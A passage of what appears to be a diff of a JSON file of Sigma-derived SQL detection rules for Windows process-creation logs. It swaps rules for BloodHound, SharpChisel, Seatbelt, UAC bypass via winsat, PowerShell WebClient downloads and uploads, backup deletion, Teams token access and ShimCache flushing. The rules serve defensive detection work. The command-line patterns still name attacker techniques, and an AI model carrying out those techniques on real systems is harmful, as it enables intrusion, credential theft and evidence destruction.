'\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1614.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Microsoft SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", - "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + }, + { + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": 